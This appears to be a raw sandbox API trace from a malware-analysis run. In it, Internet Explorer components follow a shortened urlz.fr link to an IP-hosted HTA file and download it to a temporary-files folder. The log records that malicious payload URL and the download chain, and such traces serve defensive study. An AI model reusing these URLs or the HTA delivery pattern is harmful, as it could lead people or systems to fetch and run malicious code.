[0077.619] RegOpenKeyExW (in: hKey=0x6e0, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x33f93c | out: phkResult=0x33f93c*=0x0) returned 0x2
[0077.619] RegCloseKey (hKey=0x0) returned 0x6
[0077.619] RegCloseKey (hKey=0x0) returned 0x6
[0077.619] RegCloseKey (hKey=0x6e0) returned 0x0
[0077.619] RegCloseKey (hKey=0x66c) returned 0x0
[0077.619] GetCurrentThreadId () returned 0xbf4
[0077.619] GetCurrentThreadId () returned 0xbf4
[0077.620] GetCurrentThreadId () returned 0xbf4
[0077.620] GetCurrentThreadId () returned 0xbf4
[0077.620] GetCurrentThreadId () returned 0xbf4
[0077.620] IUnknown:Release (This=0x36fd610) returned 0x1
[0077.620] GetCurrentThreadId () returned 0xbf4
[0077.620] GetCurrentThreadId () returned 0xbf4
[0077.620] GetCurrentThreadId () returned 0xbf4
[0077.620] Shell:IUnknown:Release (This=0x2e59318) returned 0x0
[0077.621] ISystemDebugEventFire:EndSession (This=0x36fd610) returned 0x0
[0077.621] IUnknown:Release (This=0x36fd610) returned 0x0
[0077.621] GetUserDefaultLCID () returned 0x409
[0077.622] GetACP () returned 0x4e4
[0077.622] GetCurrentThreadId () returned 0xbf4
[0077.624] IUnknown:Release (This=0x856f08) returned 0x0
[0077.624] IUnknown:Release (This=0x855694) returned 0x0
[0077.624] IUnknown:Release (This=0x74cc96bc) returned 0x1
[0077.624] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33fa14 | out: ppURI=0x33fa14*=0x84c09c) returned 0x0
[0077.624] IUri:GetScheme (in: This=0x84c09c, pdwScheme=0x33f9ac | out: pdwScheme=0x33f9ac*=0x11) returned 0x0
[0077.624] IUnknown:QueryInterface (in: This=0x84c09c, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f9b4 | out: ppvObject=0x33f9b4*=0x84c09c) returned 0x0
[0077.625] IUnknown:Release (This=0x84c09c) returned 0x2
[0077.625] IUnknown:AddRef (This=0x84c09c) returned 0x3
[0077.625] IUnknown:Release (This=0x84c09c) returned 0x2
[0077.625] IUri:IsEqual (in: This=0x911444, pUri=0x84c09c, pfEqual=0x33f9f4 | out: pfEqual=0x33f9f4*=0) returned 0x0
[0077.625] IUnknown:Release (This=0x911444) returned 0x7
[0077.625] IUnknown:AddRef (This=0x84c09c) returned 0x3
[0077.625] IUri:GetAbsoluteUri (in: This=0x84c09c, pbstrAbsoluteUri=0x85e1e0 | out: pbstrAbsoluteUri=0x85e1e0*="about:blank") returned 0x0
[0077.625] IUnknown:Release (This=0x84c09c) returned 0x2
[0077.640] InternetUnlockRequestFile (in: hLockRequestInfo=0x8fa908 | out: hLockRequestInfo=0x8fa908) returned 1
[0077.642] IUnknown:Release (This=0x84c3fc) returned 0x5
[0077.642] IUnknown:Release (This=0x911444) returned 0x6
[0077.642] IUnknown:Release (This=0x911444) returned 0x5
[0077.642] IUnknown:Release (This=0x84c3fc) returned 0x4
[0077.643] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x85568c, dwReserved=0x0 | out: ppSM=0x85568c*=0x36f6a60) returned 0x0
[0077.644] IInternetSecurityManager:SetSecuritySite (This=0x36f6a60, pSite=0x855694) returned 0x0
[0077.644] IUnknown:AddRef (This=0x855694) returned 0x31
[0077.644] IUnknown:QueryInterface (in: This=0x855694, riid=0x75ad61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f68c | out: ppvObject=0x33f68c*=0x855698) returned 0x0
[0077.644] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x36f6a88 | out: ppvObject=0x36f6a88*=0x0) returned 0x80004002
[0077.644] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x36f6a84 | out: ppvObject=0x36f6a84*=0x0) returned 0x80004002
[0077.644] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x36f6a80 | out: ppvObject=0x36f6a80*=0x74cc96bc) returned 0x0
[0077.644] IUnknown:Release (This=0x855698) returned 0x0
[0077.644] IUnknown:AddRef (This=0x84c09c) returned 0x3
[0077.644] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="about:blank", pdwZone=0x33f6c4, dwFlags=0x0 | out: pdwZone=0x33f6c4*=0xffffffff) returned 0x800c0011
[0077.645] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0077.645] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0077.645] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0077.645] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x33f6c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f6c8*=0x0) returned 0x0
[0077.645] IUnknown:Release (This=0x84c09c) returned 0x2
[0077.645] IUnknown:Release (This=0x3739e20) returned 0x0
[0077.645] IUnknown:Release (This=0x84c09c) returned 0x1
[0077.645] IUnknown:Release (This=0x911444) returned 0x2
[0077.645] LsDestroyContext () returned 0x0
[0077.647] IUnknown:Release (This=0x36f6a60) returned 0x0
[0077.647] IUnknown:Release (This=0x855694) returned 0x0
[0077.647] IUnknown:Release (This=0x74cc96bc) returned 0x7fff
[0077.648] IUnknown:Release (This=0x855ea0) returned 0x0
[0077.648] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x76720000
[0077.648] GetProcAddress (hModule=0x76720000, lpProcName=0xc9) returned 0x76724af8
[0077.648] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0077.648] IInternetSession:UnregisterNameSpace (This=0x857c00, pCF=0x74cc8c50, pszProtocol="res") returned 0x0
[0077.648] IUnknown:Release (This=0x74cc8c50) returned 0x1
[0077.649] IInternetSession:UnregisterNameSpace (This=0x857c00, pCF=0x74cc8c70, pszProtocol="about") returned 0x0
[0077.649] IUnknown:Release (This=0x74cc8c70) returned 0x1
[0077.649] IUnknown:Release (This=0x857c00) returned 0x1
[0077.649] IUnknown:Release (This=0x857580) returned 0x0
[0077.650] SetEvent (hEvent=0x42c) returned 1
[0077.651] GetCurrentThreadId () returned 0xbf4
[0077.651] WaitForSingleObject (hHandle=0x428, dwMilliseconds=0x1388) returned 0x0
[0077.651] GetExitCodeThread (in: hThread=0x428, lpExitCode=0x33f9ec | out: lpExitCode=0x33f9ec) returned 1
[0077.651] CloseHandle (hObject=0x42c) returned 1
[0077.652] CloseHandle (hObject=0x428) returned 1
[0077.652] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x88b118) returned 0x0
[0077.652] FreeLibrary (hLibModule=0x73870000) returned 1
[0077.652] FreeLibrary (hLibModule=0x73870000) returned 1
[0077.652] UnregisterClassW (lpClassName=0xc1d1, hInstance=0x74790000) returned 1
[0077.652] UnregisterClassW (lpClassName=0xc1cf, hInstance=0x74790000) returned 1
[0077.652] OleUninitialize ()
[0077.653] DestroyWindow (hWnd=0x10216) returned 1
[0077.653] NtdllDefWindowProc_W () returned 0x0
[0077.653] PostQuitMessage (nExitCode=0)
[0077.654] DllCanUnloadNow () returned 0x0
[0077.654] DllCanUnloadNow () returned 0x1
[0077.704] NtdllDefWindowProc_W () returned 0x0
[0077.704] FreeLibrary (hLibModule=0x74790000) returned 1
[0077.704] ExitProcess (uExitCode=0x0)
[0077.717] GetCurrentThreadId () returned 0xbf4
Thread:
id = 74
os_tid = 0xbfc
Thread:
id = 75
os_tid = 0x808
[0072.750] GetCurrentThreadId () returned 0x808
Thread:
id = 76
os_tid = 0x804
[0072.767] GetCurrentThreadId () returned 0x804
Thread:
id = 77
os_tid = 0x14c
[0072.808] GetCurrentThreadId () returned 0x14c
[0073.766] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x20, szStatusText=0x0) returned 0x0
[0073.811] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x22, szStatusText=0x0) returned 0x0
[0073.814] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x1, szStatusText="urlz.fr") returned 0x0
[0073.814] GetCurrentThreadId () returned 0x14c
[0073.818] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x2, szStatusText="104.28.15.54") returned 0x0
[0073.818] GetCurrentThreadId () returned 0x14c
[0076.020] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0xb, szStatusText=0x0) returned 0x0
[0076.063] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x3, szStatusText="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0076.063] StrCmpICW (pszStr1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10
[0076.064] StrCmpICW (pszStr1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pszStr2="res://ieframe.dll/forbidframing.htm") returned -10
[0076.064] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2e4e598 | out: ppURI=0x2e4e598*=0x911444) returned 0x0
[0076.064] IUnknown:QueryInterface (in: This=0x870040, riid=0x74909460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2e4e594 | out: ppvObject=0x2e4e594*=0x870044) returned 0x0
[0076.064] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0x2d, pBuffer=0x2e4e5d4*=0x20, pcbBuf=0x2e4e590*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4e5d4*=0x47, pcbBuf=0x2e4e590*=0x3, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0076.065] IUri:GetSchemeName (in: This=0x911444, pbstrSchemeName=0x2e4e528 | out: pbstrSchemeName=0x2e4e528*="http") returned 0x0
[0076.065] _wcsnicmp (_String1="http", _String2="data", _MaxCount=0x5) returned 4
[0076.065] IUri:GetScheme (in: This=0x911444, pdwScheme=0x2e4e574 | out: pdwScheme=0x2e4e574*=0x2) returned 0x0
[0076.065] IUnknown:AddRef (This=0x911444) returned 0x4
[0076.065] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2e4e568 | out: ppvObject=0x2e4e568*=0x911444) returned 0x0
[0076.065] IUnknown:Release (This=0x911444) returned 0x4
[0076.065] IUnknown:AddRef (This=0x911444) returned 0x5
[0076.065] IUnknown:Release (This=0x870044) returned 0x4
[0076.065] GetCurrentThreadId () returned 0x14c
[0076.066] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2e4e538 | out: ppURI=0x2e4e538*=0x911444) returned 0x0
[0076.066] IUnknown:AddRef (This=0x911444) returned 0x7
[0076.066] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2e4e508 | out: ppvObject=0x2e4e508*=0x911444) returned 0x0
[0076.066] IUnknown:Release (This=0x911444) returned 0x7
[0076.066] IUnknown:AddRef (This=0x911444) returned 0x8
[0076.066] IUnknown:Release (This=0x911444) returned 0x7
[0076.066] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2e4e51c | out: ppURI=0x2e4e51c*=0x911444) returned 0x0
[0076.066] IUnknown:Release (This=0x84c3fc) returned 0x10
[0076.066] IUnknown:Release (This=0x84c3fc) returned 0xf
[0076.066] IUnknown:AddRef (This=0x911444) returned 0x9
[0076.066] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2e4e4f8 | out: ppvObject=0x2e4e4f8*=0x911444) returned 0x0
[0076.067] IUnknown:Release (This=0x911444) returned 0x9
[0076.067] IUnknown:AddRef (This=0x911444) returned 0xa
[0076.067] IUri:GetScheme (in: This=0x911444, pdwScheme=0x2e4e4fc | out: pdwScheme=0x2e4e4fc*=0x2) returned 0x0
[0076.067] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x2e4e4d8 | out: ppu=0x2e4e4d8) returned 0x0
[0076.067] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2e4e4bc | out: ppURI=0x2e4e4bc*=0x911444) returned 0x0
[0076.067] IUnknown:AddRef (This=0x911444) returned 0xc
[0076.067] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x2e4e45c, dwFlags=0x0 | out: pdwZone=0x2e4e45c*=0xffffffff) returned 0x800c0011
[0076.067] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.067] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.067] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0076.067] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x2700, pPolicy=0x2e4e460, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2e4e460*=0x0) returned 0x0
[0076.067] IUnknown:Release (This=0x911444) returned 0xb
[0076.067] IUnknown:Release (This=0x911444) returned 0xa
[0076.067] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4e48c | out: phkResult=0x2e4e48c*=0x640) returned 0x0
[0076.067] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4e490 | out: phkResult=0x2e4e490*=0x644) returned 0x0
[0076.068] RegOpenKeyExW (in: hKey=0x644, lpSubKey="FEATURE_CODEPAGE_INHERIT", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4e44c | out: phkResult=0x2e4e44c*=0x0) returned 0x2
[0076.068] RegOpenKeyExW (in: hKey=0x640, lpSubKey="FEATURE_CODEPAGE_INHERIT", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4e44c | out: phkResult=0x2e4e44c*=0x0) returned 0x2
[0076.068] RegCloseKey (hKey=0x0) returned 0x6
[0076.068] RegCloseKey (hKey=0x0) returned 0x6
[0076.068] RegCloseKey (hKey=0x640) returned 0x0
[0076.068] RegCloseKey (hKey=0x644) returned 0x0
[0076.068] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2e4e29c | out: ppvObject=0x2e4e29c*=0x911444) returned 0x0
[0076.068] IUnknown:Release (This=0x911444) returned 0xa
[0076.068] IUnknown:AddRef (This=0x911444) returned 0xb
[0076.068] IUri:GetPropertyDWORD (in: This=0x911444, uriProp=0x11, pdwProperty=0x2e4e28c, dwFlags=0x0 | out: pdwProperty=0x2e4e28c*=0x2) returned 0x0
[0076.068] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x2e4e2f0, pcbSecurityId=0x2e4e2ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2e4e2f0*=0x68, pcbSecurityId=0x2e4e2ec*=0x17) returned 0x0
[0076.068] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x2e4e2f0, pcbSecurityId=0x2e4e2ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2e4e2f0*=0x0, pcbSecurityId=0x2e4e2ec*=0x200) returned 0x800c0011
[0076.069] IUnknown:Release (This=0x911444) returned 0xa
[0076.069] IUnknown:AddRef (This=0x84c3fc) returned 0x10
[0076.069] IUri:GetPropertyDWORD (in: This=0x84c3fc, uriProp=0x11, pdwProperty=0x2e4e064, dwFlags=0x0 | out: pdwProperty=0x2e4e064*=0xb) returned 0x0
[0076.069] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x2e4e0c0, pcbSecurityId=0x2e4e0bc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2e4e0c0*=0x68, pcbSecurityId=0x2e4e0bc*=0x11) returned 0x0
[0076.069] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x2e4e0c0, pcbSecurityId=0x2e4e0bc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2e4e0c0*=0x0, pcbSecurityId=0x2e4e0bc*=0x200) returned 0x800c0011
[0076.069] IUnknown:Release (This=0x84c3fc) returned 0xf
[0076.069] IUnknown:Release (This=0x911444) returned 0x9
[0076.069] IUnknown:Release (This=0x84c3fc) returned 0xe
[0076.069] IUnknown:Release (This=0x84c3fc) returned 0xd
[0076.070] IUnknown:AddRef (This=0x911444) returned 0xa
[0076.070] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2e4e568 | out: ppvObject=0x2e4e568*=0x911444) returned 0x0
[0076.070] IUnknown:Release (This=0x911444) returned 0xa
[0076.070] IUnknown:AddRef (This=0x911444) returned 0xb
[0076.070] IUnknown:Release (This=0x911444) returned 0xa
[0076.070] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x1, szStatusText="82.118.242.107") returned 0x0
[0076.071] GetCurrentThreadId () returned 0x14c
[0076.071] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x2, szStatusText="82.118.242.107") returned 0x0
[0076.071] GetCurrentThreadId () returned 0x14c
[0076.119] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0xb, szStatusText=0x0) returned 0x0
[0076.354] IHttpNegotiate:OnResponse (in: This=0x86dcd8, dwResponseCode=0xc8, szResponseHeaders="HTTP/1.1 200 OK\r\nDate: Tue, 27 Nov 2018 09:37:16 GMT\r\nServer: Apache\r\nLast-Modified: Thu, 22 Nov 2018 22:21:04 GMT\r\nETag: \"608e3-841-57b4848469400\"\r\nAccept-Ranges: bytes\r\nContent-Length: 2113\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\n\r\n", szRequestHeaders=0x0, pszAdditionalRequestHeaders=0x0 | out: pszAdditionalRequestHeaders=0x0) returned 0x0
[0076.354] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x21, szStatusText=0x0) returned 0x0
[0076.354] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0x1f, szStatusText="application/octet-stream") returned 0x0
[0076.354] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc198
[0076.354] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc19a
[0076.354] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1d2
[0076.354] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a4
[0076.355] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a6
[0076.355] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a5
[0076.355] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1aa
[0076.355] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1ab
[0076.355] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1ac
[0076.355] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1ae
[0076.355] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1ad
[0076.355] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1b0
[0076.355] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1b1
[0076.355] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1b2
[0076.355] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1d3
[0076.355] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1d4
[0076.355] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1a8
[0076.355] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1a9
[0076.355] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1af
[0076.355] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4d22c | out: phkResult=0x2e4d22c*=0x64c) returned 0x0
[0076.355] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4d230 | out: phkResult=0x2e4d230*=0x650) returned 0x0
[0076.355] RegOpenKeyExW (in: hKey=0x650, lpSubKey="FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4d1ec | out: phkResult=0x2e4d1ec*=0x0) returned 0x2
[0076.355] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4d1ec | out: phkResult=0x2e4d1ec*=0x0) returned 0x2
[0076.355] RegCloseKey (hKey=0x0) returned 0x6
[0076.355] RegCloseKey (hKey=0x0) returned 0x6
[0076.355] RegCloseKey (hKey=0x64c) returned 0x0
[0076.355] RegCloseKey (hKey=0x650) returned 0x0
[0076.355] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19
[0076.356] IInternetProtocolSink:ReportProgress (This=0x86dd14, ulStatusCode=0xe, szStatusText="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\AXVHa[1].hta") returned 0x0
[0076.356] GetCurrentProcessId () returned 0xbf0
[0076.356] IInternetProtocolSink:ReportData (This=0x86dd14, grfBSCF=0x11, ulProgress=0x1, ulProgressMax=0x841) returned 0x0
[0076.356] IUnknown:QueryInterface (in: This=0x870040, riid=0x74909460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2e4e0c8 | out: ppvObject=0x2e4e0c8*=0x870044) returned 0x0
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0x1, pBuffer=0x2e4f0a0*=0x0, pcbBuf=0x2e4e0d0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4f0a0*=0x61, pcbBuf=0x2e4e0d0*=0x18, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0xffff, pBuffer=0x2e4eba0*=0x78, pcbBuf=0x2e4e0d0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4eba0*=0x76, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0x2e, pBuffer=0x2e4f3a0*=0x0, pcbBuf=0x2e4e0b0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4f3a0*=0x76, pcbBuf=0x2e4e0b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0x4000000b, pBuffer=0x2e4e094*=0x0, pcbBuf=0x2e4e0d0*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4e094*=0xe2, pcbBuf=0x2e4e0d0*=0x10, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0076.356] SystemTimeToFileTime (in: lpSystemTime=0x2e4e094, lpFileTime=0x86dda4 | out: lpFileTime=0x86dda4) returned 1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0xffff, pBuffer=0x2e4eca0*=0x58, pcbBuf=0x2e4e0d0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4eca0*=0x76, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0xffff, pBuffer=0x2e4eca0*=0x44, pcbBuf=0x2e4e0d0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4eca0*=0x76, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0xffff, pBuffer=0x2e4eca0*=0x43, pcbBuf=0x2e4e0d0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4eca0*=0x76, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0xffff, pBuffer=0x2e4eca0*=0x58, pcbBuf=0x2e4e0d0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4eca0*=0x76, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0x20000013, pBuffer=0x86dd80*=0x0, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x86dd80*=0xc8, pcbBuf=0x2e4e0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0076.356] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x870044, dwOption=0x12, pBuffer=0x2e4f4a0*=0x0, pcbBuf=0x2e4e0a8*=0xf, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2e4f4a0*=0x48, pcbBuf=0x2e4e0a8*=0x8, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
